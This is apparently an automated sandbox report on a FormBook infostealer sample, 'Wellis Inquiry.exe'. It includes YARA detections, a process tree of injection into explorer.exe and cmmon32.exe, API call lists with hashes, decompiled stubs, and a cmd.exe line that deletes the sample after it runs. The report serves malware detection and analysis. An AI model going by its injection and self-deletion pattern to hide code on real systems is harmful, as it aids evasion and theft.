Oct 14, 2021 07:30:28.557920933 CEST	6100	IN	Data Raw: 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 Data Ascii: umn}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transiti
Oct 14, 2021 07:30:28.557960033 CEST	6102	IN	Data Raw: 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 Data Ascii: }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
Oct 14, 2021 07:30:28.557998896 CEST	6103	IN	Data Raw: e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 Data Ascii: ", "content-title": " " }, "ja": { "title": "
Oct 14, 2021 07:30:28.558028936 CEST	6103	IN	Data Raw: 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 Data Ascii: // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage docum
Oct 14, 2021 07:30:28.558100939 CEST	6104	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Wellis Inquiry.exe PID: 7036 Parent PID: 5404

General

Start time:	07:28:22
Start date:	14/10/2021
Path:	C:\Users\user\Desktop\Wellis Inquiry.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Wellis Inquiry.exe'
Imagebase:	0xff0000
File size:	337408 bytes
MD5 hash:	C357A8010E661A49DF2E813BD22590B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: Wellis Inquiry.exe PID: 1680 Parent PID: 7036

General

Start time:	07:28:30
Start date:	14/10/2021
Path:	C:\Users\user\Desktop\Wellis Inquiry.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Wellis Inquiry.exe
Imagebase:	0x6a0000
File size:	337408 bytes
MD5 hash:	C357A8010E661A49DF2E813BD22590B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 1680

General

Start time:	07:28:31
Start date:	14/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmmon32.exe PID: 5328 Parent PID: 3424

General

Start time:	07:29:03
Start date:	14/10/2021
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0x2c0000
File size:	36864 bytes
MD5 hash:	2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7092 Parent PID: 5328

General

Start time:	07:29:07
Start date:	14/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6796 Parent PID: 7092

General

Start time:	07:29:07
Start date:	14/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Wellis Inquiry.exe PID: 7036 Parent PID: 5404 Wellis Inquiry.exeCOMMON

Executed Functions

Function 0176BED8, Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0176BF48
GetCurrentThread.KERNEL32 ref: 0176BF85
GetCurrentProcess.KERNEL32 ref: 0176BFC2
GetCurrentThreadId.KERNEL32 ref: 0176C01B

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 00859320dd5b59ff9d9f45b0bc09a6e3ece46c6ff3f1d12b5b107b4d2c889685
Instruction ID: 04b5a9fb93d70c395dfc3dbed2b303a5898bdc4cc6972152bd643e2570ea909d
Opcode Fuzzy Hash: 00859320dd5b59ff9d9f45b0bc09a6e3ece46c6ff3f1d12b5b107b4d2c889685
Instruction Fuzzy Hash: 505166B49002498FDB14CFA9D888BDEBBF9BF49314F24846DE419A7360C7756885CF25

Uniqueness

Uniqueness Score: -1.00%

Function 0176BEE8, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0176BF48
GetCurrentThread.KERNEL32 ref: 0176BF85
GetCurrentProcess.KERNEL32 ref: 0176BFC2
GetCurrentThreadId.KERNEL32 ref: 0176C01B

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f527af93dbb012ca0486089c1ff989a2468d7f9ca2753ef4a86b6015de4d65c8
Instruction ID: 9ffad61ff8f35304dbc38dc938356d96d97d6a68c44146673f2be25be76baf4e
Opcode Fuzzy Hash: f527af93dbb012ca0486089c1ff989a2468d7f9ca2753ef4a86b6015de4d65c8
Instruction Fuzzy Hash: 6C5166B49006098FDB14CFA9D988BDEBBF9BF49314F208469E819A7360C7756884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 01769BF0, Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01769E36

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 30b37f8920dbe0d047b07895eb46868760dc19485d3999b0fbde0f7d51d3054f
Instruction ID: 92f47b2e72b87bd547d2a964d2ff6b4ba7248a13ba4cd27da4ba061ed834eddd
Opcode Fuzzy Hash: 30b37f8920dbe0d047b07895eb46868760dc19485d3999b0fbde0f7d51d3054f
Instruction Fuzzy Hash: EE714570A00B058FD724DF6AD44479ABBF9BF88208F10892EDA46DBB54DB34E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0176565C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01765719

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c80b64897780bce956d0a25fdd22534b3446712f33b8b5b20e2465e3ae6d2dc9
Instruction ID: 3a106256b522328d4f4f2e9d89a1510fc6a46eba66e33f4cb5ef93b6417c4338
Opcode Fuzzy Hash: c80b64897780bce956d0a25fdd22534b3446712f33b8b5b20e2465e3ae6d2dc9
Instruction Fuzzy Hash: 0541D4B1C00618CFDB24DFA9C884BDEBBB6FF48304F248569D809AB251DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01764124, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01765719

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e9abcbf3f5bd9e983212189246f46a03a6ac89b6983d4f1e1f9884c341df72d8
Instruction ID: 927e49ba19d1da110ec362f9ce2f7dcf105f31a642ff27f0ac1d0ce4958a173d
Opcode Fuzzy Hash: e9abcbf3f5bd9e983212189246f46a03a6ac89b6983d4f1e1f9884c341df72d8
Instruction Fuzzy Hash: DB41C2B0C0061CCFDB24DFA9C884BDEBBB9BF48304F148569D809AB251DBB55946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0176C110, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0176C197

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 49f190a9a959ca881a3f3fdf9484cb0f683856e309d3fd0832062287cf69ddd8
Instruction ID: 6702d569fec2e7e5c025a614de2067cace44d42984e8ab8658c25764d84fdc6a
Opcode Fuzzy Hash: 49f190a9a959ca881a3f3fdf9484cb0f683856e309d3fd0832062287cf69ddd8
Instruction Fuzzy Hash: 9F21D5B5900219DFDB10CF99D884ADEFBF9FB48324F14842AE954A3310D374A955DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0176C10A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0176C197

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 04b71993a3a171e7a4afbe5bb816bea4096414e06291a762be099b18979272e1
Instruction ID: 2e0ec7d18ffbaaa9e7e250ce0537b9a4252fdf18caae72c219655ab5d5a1d6a6
Opcode Fuzzy Hash: 04b71993a3a171e7a4afbe5bb816bea4096414e06291a762be099b18979272e1
Instruction Fuzzy Hash: E921E4B5900209DFDB10CFA9D884AEEFBF8FB48324F14842AE914A3310C374A955CF60

Uniqueness

Uniqueness Score: -1.00%

Function 017695F8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01769EB1,00000800,00000000,00000000), ref: 0176A0C2

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 491148774a97412ee966f3ec673329d9624db08a251cab21f799ab092bae5f77
Instruction ID: 19c54e6e39c5fb5051f7378ad8edfaaecb6ac12eec376c31c3a2ebdcea1fb781
Opcode Fuzzy Hash: 491148774a97412ee966f3ec673329d9624db08a251cab21f799ab092bae5f77
Instruction Fuzzy Hash: 5C11E4B69042499FDB10CF9AD448BDEFBF8EB88324F14842AD915B7600D375A949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0176A051, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01769EB1,00000800,00000000,00000000), ref: 0176A0C2

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1a53279a335698e5c7ba7ffdee57748163685f97897322d861c0a3fd806b11c7
Instruction ID: d6d66d905ec5e5c5c094ae4a0019a6955c3dc152c93684a83d8df69945545d28
Opcode Fuzzy Hash: 1a53279a335698e5c7ba7ffdee57748163685f97897322d861c0a3fd806b11c7
Instruction Fuzzy Hash: 7611E4B69002099FDB10CF9AD884ADEFBF8FB88314F14852AE915B7700D779A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01769DD0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01769E36

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cb5212e991bef8c1ac075a82b40354cd097ff78623bb3879e5ebc95ecbd6de64
Instruction ID: 32188fe309d40e5381f0563521f8dc207ac2e9a24da1ac5be598f485e8fcf2ec
Opcode Fuzzy Hash: cb5212e991bef8c1ac075a82b40354cd097ff78623bb3879e5ebc95ecbd6de64
Instruction Fuzzy Hash: E911E3B6D006498FDB10CF9AD844BDEFBF8AF49224F14842AD919B7600C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 016FD4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670493582.00000000016FD000.00000040.00000001.sdmp, Offset: 016FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ec17f4e01fdcc0c2a4b3e66d2900e441d7d6d94d8cb2b2ef61214a5529d1c
Instruction ID: 0ad38d1718539f766e1392ff596d5730e29d0ecd95e2f4e24317879bde8a9936
Opcode Fuzzy Hash: 838ec17f4e01fdcc0c2a4b3e66d2900e441d7d6d94d8cb2b2ef61214a5529d1c
Instruction Fuzzy Hash: A821D3B1504244DFDB05DF94DDC4B6ABF66FB88328F24896DEA050B246C336E456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0170D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670510146.000000000170D000.00000040.00000001.sdmp, Offset: 0170D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4a15a3721b428bf32ed31e8b80139325192d712f76a3d3cd2fc94592ed2dc8
Instruction ID: 28790b5e50cd9b0ae1e97505212baf5c027e0c75a0a30363517db3aebec6275c
Opcode Fuzzy Hash: 9e4a15a3721b428bf32ed31e8b80139325192d712f76a3d3cd2fc94592ed2dc8
Instruction Fuzzy Hash: BD21F571508304EFDB16DFD4D9C0B26FBA5FB84324F24C9A9E8094B286C336D856CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0170D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670510146.000000000170D000.00000040.00000001.sdmp, Offset: 0170D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae31dd46687513dcf7e68c4b7e617ac959d71a0bd6488de665a56ff18c434015
Instruction ID: 08960e6e4fc5c689e1366866adc78f4f68f436fd7430f92939856ad57b066395
Opcode Fuzzy Hash: ae31dd46687513dcf7e68c4b7e617ac959d71a0bd6488de665a56ff18c434015
Instruction Fuzzy Hash: 2921E071604304DFDB26CF94D8C4B16FBA5FB84364F20C9A9D8094B286C336D847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 016FD4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670493582.00000000016FD000.00000040.00000001.sdmp, Offset: 016FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c097fc63a04e136fcf83e2eabd5807d7d964daae9d4396e7e048285d0281e15
Instruction ID: 7c725ff7bcf069eaade9318467a12d49b378d2a6fa469caaefabffa2924116ba
Opcode Fuzzy Hash: 1c097fc63a04e136fcf83e2eabd5807d7d964daae9d4396e7e048285d0281e15
Instruction Fuzzy Hash: 3B11AF76404280DFCB12CF54D9C4B1ABF71FB84324F24C6ADD9450B65AC336E45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0170D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670510146.000000000170D000.00000040.00000001.sdmp, Offset: 0170D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
Instruction ID: a3e6b6b144fc237e738a81ec5358b312acc8278d5bca491ae25ce84cf7c1f858
Opcode Fuzzy Hash: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
Instruction Fuzzy Hash: 9111D075504380CFCB12CF54D5D4B15FFA1FB44324F24C6A9D8094B696C33AD44ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0170D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670510146.000000000170D000.00000040.00000001.sdmp, Offset: 0170D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
Instruction ID: 9c2defa023c7d6b01b39106a8c6ca9d61b408bdf70a64f01a144dc36b34467f1
Opcode Fuzzy Hash: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
Instruction Fuzzy Hash: BD118B75508380DFDB12CF98D5C4B15FBA1FB84324F28C6A9D8494B696C33AD45ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 016FD745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670493582.00000000016FD000.00000040.00000001.sdmp, Offset: 016FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff96e7b7a4f86e50039d1c610cb556905b1e9018a12f33f048246617ba76cfd3
Instruction ID: 78f6c74c4049230836abde2c5595009ee4e57a8703d578f1e3eec482f0063746
Opcode Fuzzy Hash: ff96e7b7a4f86e50039d1c610cb556905b1e9018a12f33f048246617ba76cfd3
Instruction Fuzzy Hash: 5701A7714083C4DAE7115EA5CC84BB7BB9CEF41274F08855EEE041F346D779A846CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 016FD744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670493582.00000000016FD000.00000040.00000001.sdmp, Offset: 016FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8172a45ad0e880f4fb7c404a924690018ca897148458633e8eec8b8e8164a4
Instruction ID: 204675beb4fedc16442b9e5c9dac35a2238fc88dc2578298f6e6484f35adce84
Opcode Fuzzy Hash: fd8172a45ad0e880f4fb7c404a924690018ca897148458633e8eec8b8e8164a4
Instruction Fuzzy Hash: A2F062714042849FEB118E59DCC8B63FF98EB91674F18C45AEE085F386D379A884CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0176E9D0, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0167048d004dd85a97fbdf25f713ced2ae4693245cd00f58b3f162b26f2342d6
Instruction ID: 8db682252662ca9255278904159676de7ba1500233ac1d637b8a7a245f528469
Opcode Fuzzy Hash: 0167048d004dd85a97fbdf25f713ced2ae4693245cd00f58b3f162b26f2342d6
Instruction Fuzzy Hash: 3D12C8F14217468AE314EF67F99C2897BA0B756328FB0C308D2651B6D9D7B4B14ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0176C9DC, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab9f03d401324bb0a955bf59570fc4da706e204746ab8161e327bbd3b9ec253f
Instruction ID: a2d138ec1039c79acc98dc2d4b5fe73ab004a372aa69c092b746362fb53bd078
Opcode Fuzzy Hash: ab9f03d401324bb0a955bf59570fc4da706e204746ab8161e327bbd3b9ec253f
Instruction Fuzzy Hash: 22A18C36E1061ACFCF05DFA5C8485DEFBB6FF89300B15816AE905BB225EB31A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0176E9C0, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670586320.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0529e5df2c547fea7fcb0387aad9f362263a39516c393c49be338a1a4dae2fe1
Instruction ID: 9b92e800ae28bf1e5a07af90be402fc2c0da6ebeab4de6b99484845df0466930
Opcode Fuzzy Hash: 0529e5df2c547fea7fcb0387aad9f362263a39516c393c49be338a1a4dae2fe1
Instruction Fuzzy Hash: B3C109B14217468BD710EF67F89C2897BB1BB96328F718308D2612B6D8D7B4B056CF84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Wellis Inquiry.exe PID: 1680 Parent PID: 7036 Wellis Inquiry.exeCOMMON

Executed Functions

Function 0041868A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E0041868A(void* __ecx, void* __edx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t19;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				asm("std");
				_t14 = _a4;
				_t33 = _a4 + 0xc48;
				E004191E0(_t31, _t14, _t33,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t5 =  &_a40; // 0x413a31
				_t7 =  &_a32; // 0x413d72
				_t13 =  &_a8; // 0x413d72
				_t19 =  *((intOrPtr*)( *_t33))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, _t32, _t35); // executed
				return _t19;
			}

0x0041868a
0x00418693
0x0041869f
0x004186a7
0x004186ac
0x004186b2
0x004186cd
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

1:A, xrefs: 004186AC, 004186B8
r=A, xrefs: 004186CD, 004186D4
r=A, xrefs: 004186B2, 004186C0

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: 02a8b4c4aafa410817e1f072ace664b178e03de303377494f373bff08099c9a0
Instruction ID: 7ba8d76f4a73ce0897f6265e9bd4adad01858ae69c65a922f544d942dba13ed3
Opcode Fuzzy Hash: 02a8b4c4aafa410817e1f072ace664b178e03de303377494f373bff08099c9a0
Instruction Fuzzy Hash: 29F0E2B2210108AFDB08DF89DC84EEB77A9EF8C354F158249FA0D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

